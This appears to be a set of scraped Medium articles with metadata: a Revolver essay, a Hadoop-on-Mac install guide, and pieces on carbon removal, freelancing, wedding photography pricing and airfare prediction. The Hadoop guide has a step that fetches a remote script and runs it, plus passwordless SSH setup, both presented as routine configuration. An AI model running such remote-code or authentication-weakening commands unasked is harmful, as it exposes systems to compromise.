Throughout it are jags of violins and orchestras, more lemmings, what sounds like a radio message from outer space that I later discovered was a backwards guitar solo, impenetrable lyrics, a bass that was one note over and over again until the whole thing spun apart into a player piano and a last violin line sucked up into a hole in the sky. It was like the world sounded different after that song. There’s STILL nothing like it. Tomorrow Never Knows is a singularly. It’s the weirdest catchy beautiful cacophony ever made. Who know what the hell it is. Heaven, hell, all places in between. Up down, left right, in out. I had sat there, my chin perched on the back of a couch with my head stuck between the speakers for 35 minutes, and I was exhausted. I laid on the floor and looked at the album jacket, the drawn and collaged front, and the photo of the band on the back. I knew this was my favorite album, and that that would never change. And I knew… I knew that I wanted to do something that I didn’t have a name for. I wanted to be in a band and play guitar and write songs — I knew all that, but there was something else. I wanted to… be part of something like Revolver. To build something like that. To make records. Records that weren’t just music. At the top back cover, above the list of songs, there was a sentence I didn’t quite understand. It said, “Recording produced by GEORGE MARTIN.” I didn’t know what it meant, but I was pretty sure it was the job description for me. I went on to produce records. Revolver was the standard and the inspiration. After my tinnitus ended thoughts of working in music I went on to direct plays, and again Revolver was there somehow. Somehow the sense of humor, experimentation, the delight, the oddness, the gorgeousness, the memorability of Revolver is always with me. After 40+ years, Revolver still clues me into the power of art, the power of music, and what it means to manifest the invisible — to do the work of the artist.
https://lukedelalio.medium.com/revolver-changed-my-life-f0b753f70901
['Luke Delalio']
2020-09-26 00:31:19.766000+00:00
['Beatles', 'Creativity', 'Revolver', 'Music']
Installing Hadoop on a Mac
Is the only thing standing between you and Hadoop just trying to figure out how to install it on a Mac? A quick internet search will show you the lack of information about this fairly simple process. In this brief tutorial, I will show you how you can very easily install Hadoop 3.2.1 on a macOS Mojave (version 10.14.6) using Terminal for a single node cluster in pseudo-distributed mode. To begin, you will need to have installed several packages that need to be placed in the appropriate directories. The HomeBrew website has made this a very simple task, automatically determining what is needed on your machine, installing correct directories and symlinking their files into /user/local. Additional documentation may also be found on their website. Install HomeBrew Copy the command at the top of the page and paste into a new terminal window. You will be notified of what will be installed. Pressing RETURN initiates the process: $ /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" Confirm you have the correct version of java (version 8) on your machine. If it returns anything other than 1.8., be sure to install the correct version. $ java -version $ brew cask install homebrew/cask-versions/adoptopenjdk8 Install Hadoop Next, you will install the most current version of Hadoop at the path: /usr/local/Cellar/hadoop. This happens to be 3.2.1 at the time of the writing of this article: $ brew install hadoop Configure Hadoop Configuring Hadoop will take place over a few steps. A more detailed version can be found in the Apache Hadoop documentation for setting up a single node cluster. (Be sure to follow along with the correct version installed on your machine.) Updating the environment variable settings Make changes to core-, hdfs-, mapred- and yarn-site.xml files Remove password requirement (if necessary) Format NameNode Open the document containing the environment variable settings : $ cd /usr/local/cellar/hadoop/3.2.1/libexec/etc/hadoop $ open hadoop-env.sh Make the following changes to the document, save and close. 
Add the location for export JAVA_HOME export JAVA_HOME= “/Library/Java/JavaVirtualMachines/adoptopenjdk-8.jdk/Contents/Home” You can find this path by using the following code in the terminal window: $ /usr/libexec/java_home Replace information for export HADOOP_OPTS change export HADOOP_OPTS=”-Djava.net.preferIPv4Stack=true” to export HADOOP_OPTS = ”-Djava.net.preferIPv4Stack=true -Djava.security.krb5.realm= -Djava.security.krb5.kdc=” Make changes to core files $ open core-site.xml <configuration> <property> <name>fs.defaultFS</name> <value>hdfs://localhost:9000</value> </property> </configuration> Make changes to hdfs files $ open hdfs-site.xml <configuration> <property> <name>dfs.replication</name> <value>1</value> </property> </configuration> Make changes to mapred files $ open mapred-site.xml <configuration> <property> <name>mapreduce.framework.name</name> <value>yarn</value> </property> <property> <name>mapreduce.application.classpath</name> <value>$HADOOP_MAPRED_HOME/share/hadoop/mapreduce/*:$HADOOP_MAPRED_HOME/share/hadoop/mapreduce/lib/*</value> </property> </configuration> Make changes to yarn files $ open yarn-site.xml <configuration> <property> <name>yarn.nodemanager.aux-services</name> <value>mapreduce_shuffle</value> </property> <property> <name>yarn.nodemanager.env-whitelist</name> <value>JAVA_HOME,HADOOP_COMMON_HOME,HADOOP_HDFS_HOME,HADOOP_CONF_DIR,CLASSPATH_PREPEND_DISTCACHE,HADOOP_YARN_HOME,HADOOP_MAPRED_HOME</value> </property> </configuration> Remove password requirement Check if you’re able to ssh without a password before moving to the next step to prevent unexpected results when formatting the NameNode. $ ssh localhost If this does not return a last login time, use the following commands to remove the need to insert a password. $ ssh-keygen -t rsa -P '' -f ~/.ssh/id_rsa $ cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys $ chmod 0600 ~/.ssh/authorized_keys Format NameNode $ cd /usr/local/cellar/hadoop/3.2.1/libexec/bin $ hdfs namenode -format A warning will tell you that a directory for logs is being created. You will be prompted to re-format filesystem in Storage Directory root. Say Y and press RETURN. Run Hadoop $ cd /usr/local/cellar/hadoop/3.2.1/libexec/sbin $ ./start-all.sh $ jps After running jps, you should have confirmation that all the parts of Hadoop have been installed and running. You should see something like this: 66896 ResourceManager 66692 SecondaryNameNode 66535 DataNode 67350 Jps 66422 NameNode67005 NodeManager Open a web browser to see your configurations for the current session. http://localhost:9870 Information about your current Hadoop session. Close Hadoop Close Hadoop when you are all done. $ ./stop-all.sh I hope this short article has helped you get over the hurdle of installing Hadoop on your macOS machine!
https://towardsdatascience.com/installing-hadoop-on-a-mac-ec01c67b003c
['Siphu Langeni']
2020-04-02 02:37:52.066000+00:00
['Data Science', 'Hadoop', 'Data Engineering', 'Big Data', 'Mac Os X']
How philanthropy can help to scale carbon removal
To be clear, we are not suggesting that more mature solutions merit less support — rather, forestry, BECCS, and DAC simply require different types of support concomitant with their relative level of technological readiness. For instance, funding for communications is required to socialize the understanding that not all removal equates to BECCS, and that direct air capture is poised for rapid cost reductions as it will benefit from learning by doing and economies of scale (much in the same way as solar photovoltaics continually beat expert forecasts on price declines and capacity additions). However, we will focus this discussion on several less-heralded carbon removal solutions: enhanced weathering, soil carbon sequestration, and ocean removal approaches. Many of these solutions still have major question marks that philanthropic funding can help answer in order to drive their development forward. Enhanced weathering: Over geologic time scales, the natural weathering of rocks containing certain minerals — like serpentine, silicates, carbonates, and oxides — draws down carbon dioxide from the atmosphere and stores it in stable mineral forms, thereby playing an important role in regulating atmospheric CO2 concentrations. The centuries and millennia that these reactions typically take are too slow to help with the climate crisis. Fortunately, there are ways of safely speeding up the weathering. By grinding up rocks to increase their reactive surface area or by adding heat or acids to speed up reaction rates, enhanced weathering could be an important climate solution with huge potential to scale. (Experts estimate that, after considering energy requirements, enhanced weathering could reasonably remove up to 4 gigatons of carbon per year.) Philanthropy can support basic research to substantiate these claims in the real world, focusing on supporting process improvements and mapping resource potentials. If the benefits of enhanced weathering prove to exceed the challenges, the near-term research efforts funded by philanthropy can help unlock greater government RD&D and help secure private capital to move this approach from the lab to pilots. Soil carbon sequestration: Soils have the potential to store carbon at scale, though global soils have historically lost an estimated 133 Gt of carbon due to human-driven land use change. Today, there are a wide variety of land management strategies, practices, and technologies that fall under the aegis of soil carbon sequestration that can restore a portion of this lost carbon. However, there is no one-size fits all system that can help realize that scale. The efficacy of these practices turns on local soil type, climatic factors, and crop type. Philanthropy has been and should continue to fund research to better answer basic questions around which practices are most effective in what scenarios and how permanent the removal is. In addition to practice change, research to explore new varieties and crop types that sequester more carbon will be critical. For example, we are learning that switching to crop types with long roots, such as kernza, may support even greater soil carbon storage potential than can be realized through land management practice changes alone. There is also currently no streamlined, consistent, and cost-effective way to measure and verify soil carbon sequestration on the farm-level. 
This lack of protocols could greatly influence our assessment of soil carbon sequestration potential and hinder the incorporation of these practices into climate policy frameworks. Philanthropy can play a big role in incentivizing streamlining among current standards and in helping to set up the frameworks of the future. Sequestration efforts should also be combined with efforts to boost crop yields, allowing us to both store more carbon in the soil, prepare our food systems for the effects of a changing climate, and free up additional land for high-carbon ecosystems (such as forests and wetlands). Increasingly, land will be stretched to deliver on multiple priorities — from food production to ecosystem services to bioenergy production to carbon sequestration — and philanthropy can play an important coordination and consolidation role among these veins of research. Ocean approaches: There are a number of ocean-based approaches that haven’t been explored in detail to-date. In fact, the National Academy of Sciences excluded ocean approaches (except coastal wetland restoration) in their recent landmark report. These approaches utilize ocean ecosystems to sequester carbon and can include direct ocean capture, kelp farming, ocean alkalinity enhancement, and other blue carbon approaches. Because many of these strategies are in the early stages of development today, it will be important for philanthropy to support analyses to better understand the technical and economic potential for these solutions, as well as any risks from early deployment that would necessitate governance standards in the near term. There are a number of ocean-based approaches to carbon removal that haven’t been explored in detail to-date, including kelp farming. Photo: Shane Stagner Climate philanthropy is in a unique position to accelerate progress on carbon removal and increase the odds that multiple removal approaches reach gigaton scale before 2050. Our theory of change is rooted in our abilities and limitations. Philanthropy can support research (both into technical aspects and communications and messaging strategies), fund advocacy, policy development, and governance frameworks, and take on risks that governments or the private sector can’t or won’t. However, philanthropic resources are small relative to the many trillions in public and private capital that will ultimately need to be allocated toward climate solutions. Thus, any credible strategy from philanthropy should be focused on removing barriers and unlocking other forms of capital. The task ahead is daunting, and we are clear-eyed about what Paris-compatibility will entail — multiple simultaneous transformations in the ways that we produce, transport, and consume. Carbon removal is not a stand-alone task, but must be integrated into the larger economic and ecological systems they are deployed into. There are some carbon removal approaches that we know will have multiple benefits and can scale — these we should begin supporting through communications, policy development, advocacy, and investment. There are also many other approaches where it is too early to tell if they will be able to contribute to large-scale removal — but the urgency of the problem demands that we explore all options that hold the promise of arresting and reversing the climate crisis.
https://carbon180.medium.com/2050-priorities-for-climate-action-how-philanthropy-can-help-to-scale-carbon-removal-c0ac667361e6
[]
2019-06-05 20:13:10.407000+00:00
['Climate Change', 'Philanthropy', 'Future', 'Technology', 'Science']
To Find a Niche, Stop Looking
The niche issue would always leave people confused. The point of focusing on one theme for your content can be horrifying. How can you forget other topics or specialties and focus on one thing alone? Doesn’t it mean that you’re limiting yourself to fewer people? Doesn’t that mean less money? These are the questions that go through your mind when it comes to picking a niche, but as Pat Flynn says it best: There are riches in the niches. To charge more, you have to niche down. Nobody takes generalists seriously. You wouldn’t feel safe at a Doctor who can claim to know how to treat every part of your body — you would want to work with a specialist. The same thing goes with your clients. They wouldn’t like to work with a freelancer who claims to be an expert in everything because you cannot give your 100% to several things. I remember when I was writing the content for my website (it’s now live by the way), and I wanted to create content for the service page. Initially, I tried to include all the things I know how to do. I wanted to write — landing pages, emails, sales letters, sales brochure copies, ebook writing, SEO, and social media management services. In the agencies I work for, I do all of these, so I’m pretty experienced in them. But I wanted to include what I was best at and what came to me easily. Before now, I’ve had clients commend me on how well I use storytelling to make their blog posts and emails more engaging. I figured out that I easily come up with content for blogs and emails, but the others seemed more challenging (I still delivered good results though) I just included the two skills I was best at and used it as main service offerings — and I’ve been going on with them. I see it a lot on freelancing marketplaces how people include many skills on their profile. Although I can understand the mindset behind it is to attract a broader range of clients, but it shouldn’t be so because specialty is essential. You have to specialize in something to be able to charge premium fees. Everybody has that thing they do effortlessly, which other people will complain about how difficult it is. Writing is that thing for me. And within writing, there are sub-niches. I picked blog posts and emails as my specialty because I’m good at using stories to improve content engagement. I cringe when I write some technical pieces that don’t have any flair because it’s simply not me. I understand this, so naturally, I’d have to lean towards what I’m best at.
https://medium.com/change-your-mind/to-find-a-niche-stop-looking-f06c848478f2
['Tochukwu Okoro E.']
2020-06-26 11:47:11.899000+00:00
['Inspiration', 'Freelancing', 'Writing Tips', 'Creativity', 'Writing']
How Much Should a First Time Wedding Photographer Cost?
Last Updated: August 9th, 2019 The average price range we would expect a first time wedding photographer to charge for their services is between $0 — $1,000. Some photographers looking for their absolute first wedding experience may be willing to shoot for free in exchange for “exposure” and the ability to build their wedding photography portfolio. On the other hand, some photographers will deem their time worth something monetary, but will still want to offer highly discounted services to be competitive with other established photographers in the marketplace. There is no hard and fast rule on any of this. Our opinion is based on our own personal experience pricing our wedding photography services and seeing the starting rates that were charged by other photographers around the web and in our circle of friends. If you’re here just for the hard numbers, you have them already! If you want some more detail about why we feel a first time wedding photographer will fall in the $0 — $1,000 price range — we’re going to cover that in more detail now. The Photography Intern vs. the Photography Professional No matter what job a person is choosing to work, there will be some level of a learning curve. The best wedding photographers will normally have the opportunity to assist, shadow, and second shoot with other already established wedding photographers to get a taste of the work without having to fully invest themselves into the responsibilities of the job. We often think of starting photographers as the “interns” of the wedding industry in much the same way a person would intern to be a teacher, counselor, etc. While the idea of an “unpaid intern” seems to be getting less common (at least in the United States), it still remains one potential route. The idea here is that this intern is receiving compensation in the form of experience — and that may be sufficient compensation for some. This is just the simple fact — and while many photographers (and frankly — creatives working in virtually any industry) will object to the idea of “working for exposure”, we can at least understand the logic behind it. What working for “exposure” actually results in Okay — just because we can make sense of working for exposure, we don’t really agree with it in principal. This is especially true in the field of wedding photography — which is very high pressure and high stress at times. As an outsider looking in, it may seem easy enough — a person taking pictures of people getting married. In practice, though, there’s a lot more to it. The need for communication and designing effective logistics of the wedding day are all just a few things outside of “photography” we do. Some of the earliest shoots we did were for free and with exposure being an incentive. While growing our portfolio was beneficial, the exposure never really translated into anything tangible. We rarely would receive referrals of new business from these shoots. While we benefited from the hands on experience (and maybe for some this is enough!), that was about the extent of our benefit. Every wedding photographer, new or experienced, has to make the decision of what their time is worth. For those just starting out, working for free to get that little bit of experience may be okay, and that’s a fine decision if you go that route. For us — our time is valuable, and free is never an option anymore (save maybe for shooting photos through a charity like Now I Lay Me Down to Sleep). A wedding photographers’ job is not just 8 hours on a single wedding day. 
In practice, every booking we have results in at least 40–80 hours of work — an engagement shoot, wedding day shooting, photo editing, email communications, in person meetings, assembling a timeline, etc. Whether you are a photographer trying to figure out your pricing, or a prospective client looking to figure out how much you should be expecting to pay — we challenge you to keep this in mind. The wedding photographers you are looking at (or maybe comparing yourself too in some ways) are people too, and they probably put a ton more into their job then you realize. They should be paid accordingly — and they get to dictate their value. If that value is free for the first client — then fine, let them do it. If it’s $500 — then rad, let them do it. If they decide to take a giant leap and maybe already have a lot of photography experience in other niches, then by all means they can jump in at a higher price point. But make no mistake about it: exposure doesn’t = compensation. Rarely does the promise of exposure pay off. Money = Real Compensation The defining feature of a professional wedding photographer is they will charge money (any amount) for their services. As we started to charge to shoot weddings and other sessions, we began to approach things as a business instead of someone just dabbling in what is virtually a new hobby. The money we made we invested again and again into new camera gear, professional services to make our workflows better and give our clients better experiences, and over time — allow us to do things with money on a personal level like travel more. We think it’s entirely reasonable if a person is just starting in in this industry to get their feet wet with little or no financial incentive, but that is not a sustainable way of living. Our efforts have value — even if they are ultimately artistic pursuits. If you’re a newbie wedding photographer, consider charging even $50 for your first wedding. If you don’t have the photography portfolio established, at least make people value your time and efforts. If you’re a potential client looking for a wedding photographer on the cheap, be willing to spend at least a little bit of money on someone who will be present and documenting one of the most important days of your life. If the photographer is against charging you, considering dropping them a tip at the end of the night as a way of saying thanks for their time. 3 Benefits of Hiring a First Time Wedding Photographer 1). Lower costs for clients on a budget. For people looking to hire a wedding photographer without a lot of extra spending money, those photographers just starting out are going to be a good match. While they won’t have the level of experience of portfolio to support them, they can still be great to work with and capture the day. When we got married back in 2016, we were on a tight budget for our wedding. While wedding photography was important for us — at the time, affording a $5,000 photographer wasn’t in the cards as we struggled to even keep our rented house heated — even if we love and respect the work of the people we saw. We ended up finding a great photographer who was starting out, had a rocking time, love our photos, and still stay connected as we’ve had the opportunity to see her grow her wedding photo business. Related: 2). Creating opportunities for the photographer. The photography industry is filled with a lot of people available to take on work. Often, the hardest part is getting the first gig or two. 
As a client, giving someone a chance to make their dreams come true is a huge deal. Obviously, you will want to be sure you click with the person and they seem like they can come through (within reason) on what you are wanting — but this is a great side effect. 3). They will bring an unrestricted point of view to your wedding. It’s easy for wedding photographers who have done dozens (or hundreds) of weddings to get into a simple mindset of doing the same things over and over. Don’t get us wrong — there is definitely value to that sort of approach in some situations, but it can just as easy turn into cynicism and a bad case of “honing it in” just to get some shots done. Beginner photographers will often be a lot more unhinged. They’re more excited to take great photos, and have a really great time doing it since it won’t feel like work just yet. Photographing one wedding is a lot different than photographing your 60th — we can tell you that! 3 Downsides of Hiring a First Time Wedding Photographer 1). They lack experience. After the wedding day is over, it’s really easy to tell the good wedding photographers from the bad ones. As we’ve pointed out, not all beginner photographers will be bad — but we can say they will lack the experience that is sometimes necessary to navigate wedding days successfully. You might be thinking — weddings aren’t that hard!! Sure — some of them are not. But others throw curveballs with schedules being thrown off, family & friends of the B&G stirring up drama, and so on. A photographer with a lot of wedding experience will be able to better adapt and get the shots that are needed. More than this — they will be able to predict these types of things as well. 2). They lack organization. We look back at our earliest weddings and realize — “wow, we were pretty disorganized!” We struggled with figuring out the flow of the day, communicating effectively with clients, and even just finding our way around wedding venues. Since then, our approach has become much more refined and, well, professional. Now we start to get organized before many of our clients even book with us. We get all the info we need upfront. We send out a wedding questionnaire about a month in advance and put together a timeline to help our clients get on the same page as us for the flow of their day. Little things like these go a long way to creating organization pro-actively. 3). They won’t have the best gear to back them up. The honest truth is, budget photographers will be photographing on budget gear. We mentioned in this post that we shot our first weddings on a Canon Rebel camera — a good beginner camera, but not really one that is up to the task of making professional images in any consistent fashion. The (obvious) reason for this is because professional camera gear costs money. If a wedding photographer isn’t being paid enough to afford this type of equipment, how can they take really great photos? Because the actual costs can often feel intangible, we can tell you we’ve spent over $30,000 on camera gear to help us support the creation of high quality and beautiful images in any environment. Budget gear can work when conditions are right, but once you enter a low light or imperfect lighting environment, it becomes harder and harder to get good images. If anything is true about wedding photography, it’s that consistency should be one of the goals. If you’re an aspiring wedding photographer and need help getting the right camera, lenses, etc. — check out our Recommended Gear pages right now! 
Your Thoughts? So — what do you think? Is the price range of $0 — $1,000 reasonable in your mind for a first time wedding photographer? Why or why not? We’d like to hear your thoughts and let this run into a good discussion on the topic. We know that many people have opinions including established photographers, prospective clients trying to figure out what is a normal rate to be paying, and the first time photographers themselves! Let us know which camp you fall into, too!
https://medium.com/swlh/how-much-should-a-first-time-wedding-photographer-cost-7f9ecb67706d
['Chris Romans']
2019-08-09 22:41:18.156000+00:00
['Freelancing', 'Business', 'Photography', 'Startup', 'Entrepreneurship']
Combining Data Science and Machine Learning with the Aviation Industry: A Personal Journey through a Capstone Project (Part II)
As a result of these initial scores, Figure 7 and Figure 8 above have been created to analyze the residuals within our model for training and testing. Each figure tells us that our model was appropriately chosen as the residuals do not show any clear patterns and also decently reveal an even spread of points above and below the horizontal red line. The horizontal red line represents the idealized regression of our model while the scattered points represent the difference in value of each consecutive prediction and label. Discovering a pattern in the residuals with our own eyes would indicate that we can use a better model to describe the system — logically, if you recognize a pattern in your errors, then that means you should recognize that there is a way to reduce that error by incorporating such pattern into your model. If all the residuals in both graphs showed uneven spread — where a significant amount of points exist in one threshold separated by the horizontal line over the other, or where residual show a pattern of slowly spreading out further and further from the horizontal line — it means your model could still be tweaked to account for evening out the residuals. Conclusions, Study Summary, and Thanks… It’s safe to start with stating that the study showed signs of a moderate success. From a variety of constraints — such as limited air travel in the new regime change, problems integrating API data together, unbalanced data, time constraints, data access restraints, and more — we were able to come out with a “proof-of-concept” study to show how a machine learning model can be used to predict the minimum cost threshold of airline tickets in this new regime. On the contrary, it is still appropriate to mention that the limitations of our model can make this attempt pointless in a business perspective due to how niche the study had become, where some corners had to be cut, and how practical/reliable the models will be. However, almost all models will face general limitations due to niche barriers, which leaves us hopeful to say that our model is just like any other models used to predict the same label (it can only get better). Through this study, a lot was covered, and it may be difficult now to fully gather together what was taken from both of the articles written here. To summarize, we as data scientists were approached by a business to answer the question, “What is the minimum cost threshold an airliner can charge their passengers per flight and how can we make a model that discovers this?” We were given a month time to have a working proof of concept. We achieved these goals, to some degree. Through the process, we learned about regime change and how the Covid-19 pandemic has played an instrumental role in our data collection phase. We learned about the limitations of using different APIs and what sort of cleaning must be done for data. We discussed how we can overcome data domain issues and create data out of our collection methods by using unique ways to increase data and add diversity to it. We learned about bootstrapping to expand our data and machine learning methods such as Linear regression, cross validation, KNN regression, and Decision Tree regression. We learned about ensemble machine learning such as Bagging regression and Random Forest and simultaneously discussed the data imbalance occurring from the trends we uncovered. We ultimately created a model with cross validated mean absolute error of $173 — all done without heavy hyperparameter tuning. 
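For readers who want to see the shape of this evaluation in code, the sketch below reproduces the two pieces discussed above — a cross-validated mean absolute error and a residual-versus-prediction plot — using scikit-learn. It is only an illustration: the file name, column names and model settings are assumptions, not the project's actual pipeline, and the real study's bootstrapped flight and fare data are not public.
# Illustrative evaluation loop; assumes numeric, already-encoded features.
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.ensemble import RandomForestRegressor
from sklearn.model_selection import cross_val_score, train_test_split

df = pd.read_csv("flights.csv")                # hypothetical file
X = df.drop(columns=["ticket_price"])          # hypothetical label column
y = df["ticket_price"]

model = RandomForestRegressor(n_estimators=100, random_state=42)

# Cross-validated mean absolute error, the metric quoted in the summary above
mae_scores = -cross_val_score(model, X, y, cv=5, scoring="neg_mean_absolute_error")
print(f"CV MAE: ${mae_scores.mean():.0f} (+/- ${mae_scores.std():.0f})")

# Residual plot of the kind shown in Figures 7 and 8: error versus prediction
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)
model.fit(X_train, y_train)
predictions = model.predict(X_test)
residuals = y_test - predictions
plt.scatter(predictions, residuals, alpha=0.5)
plt.axhline(0, color="red")                    # the idealized zero-error line
plt.xlabel("Predicted minimum ticket price")
plt.ylabel("Residual")
plt.show()
A healthy result looks like the figures described above: residuals scattered evenly on both sides of the red line with no obvious pattern.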
To me, this capstone project served as a very personal journey to prove myself in the world of data. I wanted to use what I knew about the aerospace industry and combine it with data analytics to ultimately showcase a project worth investing more time and resources into. With a more stable regime, more access to data, and more time, this project has the capability to scale to help a real-world business. Writing this series has been a joy as I wanted to really express what I know to the world and also help someone learn from the study. Machine learning is a popular field to talk about, but it is often hard to find real-world practical implementations models. Many times, machine learning is left back with research as its uses for studies become too personalized around a specific problem. Ultimately I want the people, who took their precious time from their day to read this article, to come out of this series learning something new and thinking on ways to better analyze data and to apply machine learning to societal problems. I greatly appreciate your time and give my sincerest thanks. Do not stop teaching yourself and do push on to bigger and better things while you still can in this world; cherish what you learn as you go on. Cheers! BONUS: Learning How Thermodynamics can be Used to Predict Pricing My background is in engineering and I did as best as I could to reflect that here, but I know there is more which could have been done to better integrate engineering concepts into the study. In truth, this capstone project was initially inspired by a project I had done in my undergraduate studies with Hofstra University. One of my final design projects was meant for my Thermal Engineering course, which is the field that studies thermodynamic principles on machines. In this senior design project, I analyzed a trans-Atlantic flight I flew on earlier that year and collected data regarding that flight’s speed and altitude from FlightAware.com. At the time, it was much easier to get this data ported into an Excel spreadsheet, without the need for scraping — and this was before I knew how to use Python, how to web scrape, or how to play with APIs. From this data alone, along with some idealized assumptions, I was able to successfully perform a comprehensive idealized jet propulsion engine analysis on the plane’s engines and determine many important properties of the air traveling through the turbofans. I wanted to include this section as a bonus for one to ponder on when thinking about this study, as it is the “lost link” still wished to be integrated into the project, but could not have been implemented due to the FlightXML API constraints in the study and the lack of flight data due to Covid-19. Instead, I will give a walkthrough description of the project performed back in my undergraduate course in 2018, as an example to show what extra data could have been generated to potentially help better our model. On October 17th, 2018 I flew on flight BA115 (British Airways flight 115) to travel from London Heathrow Airport to JFK International Airport. The goal of such previous project was to perform and analysis on the thermodynamic cycle states of the engines. FlightAware.com was used primarily to access accurate speed and altitude measurements of the individual flight, as the plane logged such information over time to nearby radio checkpoints along the route. 
From FlightAware.com, it was also discovered that the plane flown was a B747–400, a quad-jet aircraft and a variant of the B747 series — widely considered the most notable aircraft design in the history of human flight. Above are two images of the October 17th flight flown in 2018. Unfortunately, it is no longer possible to access that graphic from FlightAware.com, as basic-access users can only see 3 months of data history. As a result, take the referenced source for the above graphics with the caveat that it may not reflect the exact path described in the study, but it is similar enough for our intended purposes. From FlightAware.com, I was able to retrieve 660 data points of speed, altitude, direction, time, and more for flight BA115. From this data, it was determined that the flight lasted eight hours and fifteen minutes (29,700 seconds) and that the total distance flown was 5,922.386 kilometers. The weather that day showed clear skies throughout the entirety of the flight, eliminating the need for heavy environmental constraints.
(Figure: the ideal jet propulsion cycle on a T-s diagram, referenced from Cengel Y.A. & Boles M.A., 2002. Thermodynamics: An Engineering Approach. McGraw-Hill Companies Inc., New York, NY. pp. 483–487.)
In analyzing thermodynamic machines, diagrams such as the one above are used to understand the different property states occurring through the machine's life cycle. This one showcases the relationship between entropy and temperature within the jet engine's idealized life cycle. Entropy (commonly denoted by the variable "S" in theoretical thermodynamics, unlike our diagram's lowercase "s" for specific entropy on the horizontal axis) is a measure of how much energy is not available to do work in a system. It is often associated with chaos, or with how a system becomes more disordered over time. Entropy is measured in Joules/Kelvin. Engineers must understand what entropy is, but will more often use specific entropy in their analysis, whose units are kiloJoules/(kilograms*Kelvin) — in other words, entropy per unit mass. Specific entropy is used to analyze a particular mass within a system, hence the kilogram units in the denominator. Specific entropy changes with the state of the system — for water, empirical steam tables are often referenced to look up specific entropy and better understand a system. In our case we are analyzing air, where such tables are not needed. Returning to our diagram, the T-s (temperature vs. entropy) diagram indicates how the energy of the air within the plane's engine evolves during its cycle, with pressure held constant across some processes. In states one through three, pressure is increased through isentropic compression: air travels from the engine's inlet, through the diffuser and then through the compressor. In process three to four, the air travels from the compressor through a burner/combustion chamber. The air is heated at constant pressure, raising its entropy and increasing the heat transfer per unit mass (denoted by the variable "q"). The air is now primed for a greater energy release.
In process four through six, the air undergoes isentropic expansion: pressure is released as the air travels from the combustion chamber, through the turbine, and out through the nozzle exit. That pressure release is what continuously thrusts the aircraft forward with immense force.
Throughout the study, several assumptions and initial conditions need to be addressed for the analysis. First, air is treated as an ideal gas, meaning its properties follow the ideal gas relations at the conditions considered. From Appendix A.1 in the fourth edition of Engineering Thermodynamics by M. David Burghardt and James A. Harbach, the specific heat of air at constant pressure used in the study was 1.005 kiloJoules/(kilograms*Kelvin) and the ratio of specific heats (k) used was 1.4. Both of these numbers are important for the formulas used to learn about the engine's properties. Specific heat is a measure of how much energy must be added to a substance to raise its temperature. It varies with the surrounding conditions, which is why it matters what is held constant when relying on the ideal gas law (and why we treat air as ideal in this analysis). Because specific heat depends on whether volume or pressure is held fixed, we analyze it with one of those variables held constant. In our case the engine processes of interest occur at constant pressure, which is why we use the constant-pressure specific heat of air. The ratio of specific heats, k, is the constant-pressure specific heat divided by the constant-volume specific heat (k = cp/cv), and it appears throughout the isentropic relations used in this kind of cycle analysis. The operating conditions of the engine were assumed to be steady state, meaning the system state variables remain constant in time.
(Self-made whiteboard image.)
The plane was theoretically treated as a stationary object, with the recorded speed of the aircraft taken as the free-stream air velocity (denoted "v" subscript "∞"), equal to the velocity of the aircraft (denoted "v" subscript "aircraft"). This assumption lets us treat the free-stream velocity as the velocity at each jet engine intake. Furthermore, kinetic and potential energy in the system were taken as negligible except at the inlet and exit conditions, and the atmospheric temperature, pressure, and air density were averaged values between zero and 15,000 meters of altitude. From the UK Civil Aviation Authority Engine Type Certification Data Sheet №1048, it was found that four Rolls Royce RB211–524H jet engines are typically used on a B747–400. For this study, only one engine is analyzed, and its results are assumed to apply to all four jets mounted on the airplane. A uniform diameter is assumed for the jet shaft, with a length of 2.19 meters. The turbine work is assumed to equal the compressor work. The velocity of the air leaving the diffuser is assumed to be zero meters per second. The thrust generated by bypass air is neglected. The combustion chamber temperature is assumed to be 2,273 K. The overall compression ratio of the engine — the ratio of compressor outlet pressure to inlet pressure — was found to be 32.9:1.
Generalized Analysis: Where Thermodynamics could have Merged with Machine Learning
With all of these assumptions and initial conditions in place, what follows is the mathematical analysis used to study the ideal jet propulsion cycle. The analysis stems from the concepts I learned in my undergraduate studies and follows the teachings of Dr. Burghardt himself, who wrote the heavily used textbook mentioned earlier, Engineering Thermodynamics. Through this analysis, we primarily observe engine states by tracking a measure known as enthalpy — or, for our system, enthalpy per unit mass. Enthalpy is a measure of energy transfer between a system and its surroundings. Understanding enthalpy lets us uncover all of the property states needed to tell us what is going on with the engine. This is where the magic occurs, in my opinion: in a rather elegant way, we can know what is happening at every stage of the engine simply by measuring how much energy is moving within it — and we don't even have to physically be on the airplane to do it. My intention was to use this analysis to perform a very comprehensive EDA for our initial machine learning study, and to include an analysis of the different engines present on the different planes found in our study — ultimately building a highly accurate tool able to give a better cost estimate of the journey analyzed. From such known data, we could derive important features such as measured average air temperature/pressure states, measured engine efficiency, measured thrust output, and measured propulsive thrust power. Expanding further could let us analyze air-fuel ratios and changing fuel mass over a flight, and perhaps show how passenger payload plays a role in savings. Before looking at some MATLAB-generated plots of these dependent variables, we will first go over the generalized analysis.
(Equations originally typeset in self-created LaTeX.)
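As a stand-in for that original typeset analysis, the relations below sketch the standard ideal jet-propulsion-cycle equations such a study builds on. These are the textbook cold-air-standard forms using the state numbering introduced above, not the exact worked numbers from flight BA115.
\begin{align*}
&\text{Ideal-gas enthalpy change:} & \Delta h &= c_p\,\Delta T \\
&\text{Diffuser } (1\rightarrow 2),\ V_2 \approx 0: & T_2 &= T_1 + \frac{V_1^2}{2\,c_p} \\
&\text{Isentropic compression } (2\rightarrow 3): & \frac{T_3}{T_2} &= \left(\frac{P_3}{P_2}\right)^{(k-1)/k} \\
&\text{Heat added in the combustor } (3\rightarrow 4): & q_{\mathrm{in}} &= c_p\,(T_4 - T_3) \\
&\text{Turbine work equals compressor work:} & c_p\,(T_4 - T_5) &= c_p\,(T_3 - T_2) \\
&\text{Nozzle exit velocity } (5\rightarrow 6): & V_6 &= \sqrt{2\,c_p\,(T_5 - T_6)} \\
&\text{Thrust per engine:} & F &= \dot{m}\,(V_{\mathrm{exit}} - V_{\mathrm{inlet}}) \\
&\text{Propulsive power:} & \dot{W}_p &= F\,V_{\mathrm{aircraft}}
\end{align*}
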